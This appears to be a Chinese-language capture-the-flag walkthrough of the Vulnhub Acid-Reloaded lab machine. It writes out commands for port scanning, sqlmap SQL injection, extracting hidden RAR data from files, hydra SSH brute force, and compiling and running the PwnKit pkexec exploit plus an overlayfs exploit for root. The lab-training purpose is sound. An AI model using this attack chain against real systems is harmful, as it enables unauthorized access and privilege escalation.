[Vulnhub] Acid-Reloaded SQLI+图片数据隐写提取+Pkexec权限提升+Overlayfs权限提升

信息收集

IP Address Opening Ports
192.168.101.158 TCP:22,33447

$ nmap -p- 192.168.101.158 --min-rate 1000 -sC -sV

bash 复制代码
Not shown: 65534 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.7p1 Ubuntu 5ubuntu1.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 cb:47:92:da:ea:b8:d3:82:16:22:0d:a5:5f:05:47:51 (DSA)
|   2048 fd:93:9d:28:57:fb:ef:e0:8e:f1:93:66:03:67:35:50 (RSA)
|   256 a0:a6:52:fb:2c:32:b7:08:b4:ed:61:1d:2d:fa:c8:58 (ECDSA)
|_  256 85:5b:0b:e1:b0:ad:6a:d3:9e:8f:da:38:e5:bd:69:2f (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

本地权限

$ ssh acid@192.168.101.158

http://192.168.101.158:33447/

$ dirb http://192.168.101.158:33447/

http://192.168.101.158:33447/bin/index.php

$ gobuster dir -u "http://192.168.101.158:33447/bin" -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -x .php

http://192.168.101.158:33447/bin/dashboard.php

Referer : http://192.168.101.158:33447/bin/includes/validation.php

点击后来到页面

$ arjun -u http://192.168.101.158:33447/bin/l33t_haxor.php

http://192.168.101.158:33447/bin/l33t_haxor.php?id=1

$ sqlmap -u "http://192.168.101.158:33447/bin/l33t_haxor.php?id=1" --dbs --tamper=space2comment --batch

$ sqlmap -u "http://192.168.101.158:33447/bin/l33t_haxor.php?id=1" -D secure_login --tables --tamper=space2comment --batch

http://192.168.101.158:33447/UB3R/strcpy.exe

$ binwalk strcpy.exe

$ foremost strcpy.exe

foremost 是一个数据恢复工具,用于从设备、文件系统、或文件中恢复被删除的文件。它是一个命令行工具,最初是由美国空军计算机取证实验室开发的,用于从磁盘图像中恢复文件。foremost 通过识别文件头(headers)、文件中间的数据块和文件尾(footers)来实现文件恢复。

$ cd output

$ cat audit.txt

$ cd rar

$ unrar x 00000213.rar

$ cat acid.txt

$ binwalk lol.jpg

检测到包含RAR数据

$ unrar e lol.jpg

$ cat hint.txt
$ cat Avinash.contact

AQAAABIAAABOAG8AbwBCAEAAMQAyADMAAAA=

$ echo 'AQAAABIAAABOAG8AbwBCAEAAMQAyADMAAAA='|base64 -d

password:NooB@123

$ hydra -L /usr/share/wordlists/rockyou.txt -p 'NooB@123' ssh://192.168.101.158 -t 24

username:makke
password:NooB@123

权限提升

Pkexec

makke@acid:~$ find / -perm -4000 -type f 2>null

makke@acid:/tmp$ nc -lvnp 10033 >PwnKit.c

makke@acid:/tmp$ gcc -shared PwnKit.c -o PwnKit -Wl,-e,entry -fPIC

makke@acid:/tmp$ ./PwnKit

Overlayfs

makke@acid:/etc$ cd /bin
makke@acid:/bin$ ./overlayfs

OverlayFS 的工作原理

  • OverlayFS 通过将一个文件系统(称为 lower layer)叠加到另一个文件系统(称为 upper layer)上来创建一个联合视图。它的工作原理如下:

  • Upper Layer: 这是一个可写的文件系统,通常是一个临时的层(如 RAM 磁盘),用于存储修改和新增的文件。

  • Lower Layer: 这是一个只读的文件系统,通常包含基础系统文件或软件包。

  • Merged View: 用户访问的是两个层的联合视图,所有的文件和目录看起来好像在一个单一的文件系统中。

Flag

# cat /root/.flag.txt

Black@Current@Ice-Cream

相关推荐
草莓熊Lotso2 分钟前
【CMake】 工程实战:可执行文件从编译、链接到安装全流程深度拆解
linux·运维·服务器·网络·c++·cmake
路由侠内网穿透4 分钟前
本地部署开源 HTTP 服务器 OpenLiteSpeed 并实现外部访问
运维·服务器·网络·网络协议·http·开源
ppandss14 分钟前
JavaWeb从0到1-DAY7-HTTP 请求与响应处理
网络·网络协议·http
云水一下5 分钟前
下一代防火墙(NGFW)完全解析:从入门到华为eNSP模拟器实战
网络·华为·下一代防火墙
源远流长jerry6 分钟前
Linux内核之一条tcp到底占用多少内存
linux·运维·服务器·网络·网络协议·tcp/ip
骄傲的心别枯萎19 分钟前
WireShark抓取rtsp包
网络·测试工具·wireshark
kyle~24 分钟前
计算机网络---传输层
网络·计算机网络
IpdataCloud29 分钟前
大数据处理方案:海量日志中的IP归属地如何高效分析?用IP离线库实现批量查询
网络·网络协议·tcp/ip
其实防守也摸鱼29 分钟前
[特殊字符] Docker + LMArena2API 部署全流程:从环境准备到接口调用,一步到位
运维·网络·安全·web安全·docker·容器·大模型
難釋懷30 分钟前
Redis网络模型-异步IO
网络·数据库·redis